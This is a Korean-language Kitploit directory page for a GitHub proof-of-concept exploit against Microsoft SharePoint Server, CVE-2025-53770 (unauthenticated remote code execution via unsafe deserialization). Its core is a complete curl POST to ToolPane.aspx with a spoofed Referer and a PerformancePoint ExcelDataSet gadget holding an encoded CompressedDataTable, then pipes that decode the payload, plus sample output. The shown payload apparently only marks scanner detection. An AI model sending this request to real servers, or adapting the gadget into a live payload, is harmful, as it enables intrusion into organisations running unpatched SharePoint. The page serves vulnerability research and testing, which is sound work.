Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cve-2025-53770 — Microsoft SharePoint Server (CVE-2025-53770)의 안전하지 않은 역직렬화를 통한 인증되지 않은 원격 코드 실행을 위한 개념 증명 익스플로잇, 페이로드 추출 및 디코딩 명령어 포함. | Kitploit
도구/GitHubGitHub/0xray5c68616e37/cve-2025-53770
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHub0xray5c68616e37/cve-2025-53770

cve-2025-53770

Microsoft SharePoint Server (CVE-2025-53770)의 안전하지 않은 역직렬화를 통한 인증되지 않은 원격 코드 실행을 위한 개념 증명 익스플로잇, 페이로드 추출 및 디코딩 명령어 포함.

저장소 보기
31년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
웹사이트

CVE-2025-53770 SharePoint 역직렬화 RCE PoC

치명적 — Microsoft SharePoint Server의 안전하지 않은 역직렬화를 통한 인증되지 않은 원격 코드 실행 (CVE-2025-53770)

설명

온프레미스 Microsoft SharePoint Server에서 신뢰할 수 없는 데이터의 역직렬화로 인해 공격자가 원격으로 코드를 실행하고 시스템을 손상시킬 수 있습니다. Microsoft는 활발한 악용을 인지하고 있으며 포괄적인 업데이트를 준비 중입니다. CVE 문서의 완화 조치가 적용되었는지 확인하세요.

  • 영향: 인증되지 않은 공격자가 원격 코드 실행을 달성하여 전체 시스템 손상으로 이어질 수 있습니다.
  • 심각도: 치명적

개념 증명

다음 PoC는 공격자가 취약한 엔드포인트를 통해 악성 페이로드를 추출하고 디코딩하기 위해 이 취약점을 악용하는 방법을 보여줍니다.

대상 도메인은 의도적으로 reeaccated.com으로 대체되었습니다.

명령어

root@kitploit:~
curl -sk -X POST 'https://reeaccated.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx' \
  -H 'Referer: /_layouts/SignOut.aspx' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data-urlencode 'MSOTlPn_Uri=https://reeaccated.com' \
  --data-urlencode 'MSOTlPn_DWP=
<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %>
<asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest">
  <ProgressTemplate>
    <div class="divWaiting">
      <Scorecard:ExcelDataSet CompressedDataTable="H4sIAADEfmgA/4WRX2uzMBTG7/0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9+PEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c+c1Umalp33/0/62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl+ftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S/VeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1+t/pbj+vyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA=" DataTable-CaseSensitive="false" runat="server"></Scorecard:ExcelDataSet>
    </div>
  </ProgressTemplate>
</asp:UpdateProgress>' \
| grep -oP 'CompressedDataTable=&quot;\K[^&]+(?=&quot;)' \
| base64 -d 2>/dev/null \
| gzip -d 2>/dev/null \
| tee /tmp/sharepoint_decoded_payload.txt \
| grep -Ei 'IntruderScannerDetectionPayload|ExcelDataSet|divWaiting|ProgressTemplate|Scorecard'

출력

root@kitploit:~
<Info>IntruderScannerDetectionPayload</Info>
image

참고 자료

  • 테스트 페이로드 구현
  • Code White 보안 분석
  • Microsoft 지침
  • NVD 항목

영향:
인증되지 않은 공격자가 안전하지 않은 역직렬화를 악용하여 SharePoint Server에서 원격 코드 실행을 달성하고 전체 시스템을 손상시킬 수 있습니다.

도구 다운로드